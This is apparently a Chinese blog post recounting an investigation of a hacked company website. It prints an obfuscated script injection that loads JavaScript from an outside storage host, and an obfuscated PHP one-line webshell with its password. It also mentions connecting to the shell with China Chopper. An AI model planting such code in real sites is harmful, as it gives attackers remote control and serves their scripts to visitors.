昨天经理又大驾光临了一趟,说公司网站被挂马…
既然不懂渗透,那我只能瞎摸呗…
看看首页文件中都有些什么?
还有一段js代码,复制到百度上发现这段代码基本上都是出现在被黑的网站上,然而我也不知道是什么东西…
<script type="text/javascript"> window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"] ('\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x73\x66\x73\x66\x64\x73\x66\x2e\x6f\x73\x73\x2d\x63\x6e\x2d\x68\x6f\x6e\x67\x6b\x6f\x6e\x67\x2e\x61\x6c\x69\x79\x75\x6e\x63\x73\x2e\x63\x6f\x6d\x2f\x31\x39\x30\x30\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e'); </script>16进制的编码,大概转换unicode码之后得到的结果就是:
马马虎虎(明明就是一目十行)的看了下,可能是在页面上输出这个js文件的返回值。
还在页面的最底部发现了一堆链接到php文件的东西
然后就看了看这些php文件是何方神圣…
却发现这些文件都一模一样,只是名字不同而已。大概又看了一下这段php代码,意思应该是读取传给自定义方法的Reads那个地址里面的内容并输出。
接下来我就很果断的打开了这个地址,但是由于公司网站被黑的时间太久才发现,这个地址也很不凑巧的404了
通过日志来查
知道了网页哪里被挂了黑链,就得查查是怎么被拿到权限的。
首先FTP密码猜解不可能,公司所有网站的FTP密码都是随机生成大小写数字混合的。
然后再下载了网站的所有访问日志,但是由于被黑的时间太长了已经没办法找到。
接下来又想着去后台查操作日志,但是又发现后台是自己公司的前辈写的,根本就没有那么完善,更别提操作日志这种事情了。
真 · 无解
安全狗了解一下?
既然自己没这个本事查,那就用软件查查后门在哪。
快来了解一下网站安全狗:http://free.safedog.cn/website_safedog.html
(@安全狗 广告费记得要结一下)
把网站的所有文件都下载后一扫描,果然发现了很多马子。
由于以前自己也用一句话木马玩过简单的入侵,所以就很随意的点开了第二条扫描结果,然而真就确认了眼神!!!
接下来打开了这个一句话木马文件,整个文件只有两行代码暴露着,其它全都是被注释掉的代码(就为了伪装成一个织梦CMS文件也是厉害)。
把这两段代码复制到百度,看看这是啥玩意?
$a=range(1,200);$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a[113]).chr($a[115]); $b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr($a[51])]);
果然不失所望,确实是一句话。百度后知道了这一句话木马的密码是4。
那好,既然知道是一句话了,就利用以前会的一些鸡毛蒜皮,加上传说的中国菜刀试试看吧?
果然连上而且得到了网站的所有权限…
未完待续
关于渗透有太多东西要说了,还是做好网站的安全防护最重要,对于查出来的安全漏洞和木马文件各位小伙伴要及时删除,不让坏蜀黍有可乘之机!!!
至于公司网站的漏洞…emmmmm….还在找~